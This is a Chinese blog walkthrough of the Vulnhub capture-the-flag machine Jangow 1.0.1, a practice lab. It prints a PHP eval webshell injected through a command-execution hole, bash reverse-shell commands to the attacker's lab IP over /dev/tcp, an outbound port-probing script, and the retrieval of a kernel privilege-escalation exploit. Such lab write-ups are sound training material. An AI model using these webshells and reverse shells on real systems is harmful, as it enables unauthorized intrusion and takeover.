Vulnhub靶机:jangow-01-1.0.1

最新推荐文章于 2024-07-18 17:26:05 发布
最新推荐文章于 2024-07-18 17:26:05 发布
阅读量542 收藏 11
点赞数 11
分类专栏: 靶场 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48904485/article/details/135373563
版权
本文详细描述了一次针对Vulnhub靶机JANGOW_1.0.1的渗透攻击过程,包括信息收集、利用网页命令执行漏洞、反弹shell、通过端口转发和内核提权最终获取flag。
摘要由CSDN通过智能技术生成

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:jangow01(10.0.2.4)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/

二、信息收集

使用nmap主机发现,靶机ip为10.0.2.4

在这里插入图片描述

使用nmap进行端口扫描,发现靶机开放端口:21、80

在这里插入图片描述

打开网站如下

在这里插入图片描述
在这里插入图片描述

把网站的按钮都点一边,发现页面

在这里插入图片描述

在buscar后面输入ls命令,发现命令执行漏洞

在这里插入图片描述

三、漏洞利用

尝试写入webshell:echo '<?php @eval($_POST["x"]);?>)' >> shell.php

在这里插入图片描述

使用蚁剑连接,连接成功,低权限用户

在这里插入图片描述
在这里插入图片描述
反弹shell,发现报错

bash -i >& /dev/tcp/10.0.2.15/9999 0>&1

查看/bin/sh指向,可以看到/bin/sh指向dash,而我们使用的shell环境为bash

ls -al /bin/sh

在这里插入图片描述

使用bash -c指令进行反弹shell,反弹失败,可以猜测存在端口限制

bash -c 'bash -i >& /dev/tcp/10.0.2.15/9999 0>&1'

在这里插入图片描述

由于本人技术有限,看了其他大佬的解题思路,可以在kali上把1-65535所有端口绑定到某个端口上,并对其监听

sudo iptables -A PREROUTING -t nat -p tcp --dport 1:65535 -j REDIRECT --to-port 1234

在靶机上运行如下脚本进行探测(注意格式需要为Unix格式!)

# !/bin/bash
for i in $(seq 1 65535)
do
    timeout 1 nc -vz 10.0.2.15 $i && echo "$i open" >> out.txt || echo "$i closed" >> out.txt;
done
echo "all port done"

在这里插入图片描述

在这里插入图片描述

执行完毕,在同一文件夹下出现out.txt文件,发现开放端口443

在这里插入图片描述

在这里插入图片描述

重启kali,消除端口绑定命令,使用443端口进行反弹shell,反弹成功

在这里插入图片描述
在这里插入图片描述

四、提权

查看系统内核版本,发现靶机的内核版本是Ubuntu 4.4.0-31,应该可以内核漏洞提权

less /proc/version

在这里插入图片描述

搜索对应的内核版本的提权脚本

searchsploit ubuntu 4.4.0-31

在这里插入图片描述

选择45010.c脚本

searchsploit -m 45010.c

在这里插入图片描述

使用蚁剑将脚本上传到靶机上,编译执行,提权成功

在这里插入图片描述
在这里插入图片描述

获取flag

在这里插入图片描述

参考链接:Vulnhub靶机:JANGOW_ 1.0.1-CSDN博客

huang0c
关注
  • 11
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
jangow-01-1.0.1
qq_46140711的博客
09-22 1178
jangow-01-1.0.1靶机练习
VulnHub | Jangow 1.0.1
薛定的餓貓
12-05 3173
VulnHub | Jangow 1.0.1 项目地址 http://www.vulnhub.com/entry/jangow-101,754/ 难度:Easy 测试环境 攻击机:Parrot 192.168.56.104 目标靶机:Ubuntu 192.168.56.118 信息收集 开启目标靶机,登陆界面有其IP地址,不用自己手动扫描。但是还是要用nmap扫一下开启了什么端口。sudo nmap -sS -n -p- 192.168.56.118,然后使用-sV参数查看开放端口的详细信息。 打开网页
Jangow
最新发布
weixin_44770698的博客
07-18 1070
Jangow
vulnhub——jangow-01-1.0.1靶机
Re1_zf的博客
10-28 1129
我这里/出不来,所以采用的方式就是先cd到根目录,再cd到interfaces文件的目录,在当前目录使用vi修改文件内容。修改完成后按F10或ctrl+x启动(如果没有进入下面的界面,按F10或ctrl+x的时候同步按回车)修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)但是在蚁剑的虚拟终端执行后是没有反应的,必须使用反弹的交互式shell。但是加权限执行后没用,看了一下发现大小为0,传输的有问题应该。这里可以简单操作,但是使用这个虚拟终端无法提权。
vulnhub 靶机 Jangow: 1.0.1
qq_44029310的博客
06-11 3057
一次打靶记录。
VulnHub_Jangow: 1.0.1
qq_45434762的博客
04-16 638
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关主机信息kali:192.168.31.9 BreakOut:192.168.31.227信息收集使用nmap探测目标主机端口2个端口,一个FTP,一个http80端口网站打开...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub - JANGOW: 1.0.1
shuozhuqiu6452的博客
12-05 163
vulnhub - JANGOW: 1.0.1
VulnHub靶机-Jangow: 1.0.1
weixin_46694260的博客
09-15 2684
迟到的文章,就当库存发出来吧~
Vulnhub靶场】JANGOW: 1.0.1
DG_s1mple
01-21 2759
时隔这么久,终于开始做题了 环境准备 下载靶机,导入到virtualBox里面,这应该不用教了吧 开机可以看到,他已经给出了靶机的IP地址,就不用我们自己去探测了 攻击机IP地址为:192.168.2.14 靶机IP地址为:192.168.2.16 渗透过程 信息收集 万事第一步,先扫描 可以看到,靶机目前就只开放了两个端口,一个是21一个是80,首先访问80端口 发现是有网页的,随便点点,看看有没有能注入或者渗透的点 发现点到Buscar时,页面变得不一样,并且网址出现了可疑的后缀 我们试着运行一
【靶场实战】Vulnhub - JANGOW: 1.0.1 靶标实战
做自己喜欢的事,并将其发挥到极致!
05-30 1111
Vulnhub - JANGOW: 1.0.1 靶标实战
vulnhub靶场,JANGOW: 1.0.1
kukudeshuo的博客
02-17 1917
vulnhub靶场,JANGOW: 1.0.1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/ 攻击机:kali(192.168.109.128) 靶机JANGOW: 1.0.1(192.168.109.198) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:提升为root权限获取root目录下的flag 信息收集 使用arp-scan确定目标靶机 确定目标靶机
靶场练习No.1 Vulnhub靶场JANGOW01
hljzzj的博客
01-13 3106
2022年开始了,去年的6月份开始断断续续学习了半年的渗透知识,为了能持之以恒我恢复了以前不用的公众号,将我所学的内容用练习靶机的方式发布出来,也许会帮助到想入门的小伙伴们,也为了监督自己,今年的目标是200个靶机练习,小伙伴们让我们一起卷起来吧!
jangow-01-1.0.1靶机复盘
weixin_44681307的博客
07-09 151
为什么要说防火墙,后来才发现这个靶机设置了防火墙,只有允许的端口允许的命令才可以用,其他的都不能用,包括端口也只有443端口被允许通过。因为nc -e不能用,所以就在网上找了个反弹shell的命令,这里要注意的是只有443端口能用,别的端口都不能用。在网址后面随便输入ls命令,发现可以用,经过尝试发现这里可以注入代码,但是有一些命令被禁用了,比如nc。搜了一圈发现有两个php文件挺可疑,就发送到自己电脑上了,实际后面没啥用,ftp也没啥用。测试后发现是可以的,代码不见了,说明被执行了。
VulnHub-Jangow-01-1.0.1打靶记录
qq_43534481的博客
08-21 557
Vulnhub 靶场 jangow打靶记录
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huang0c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值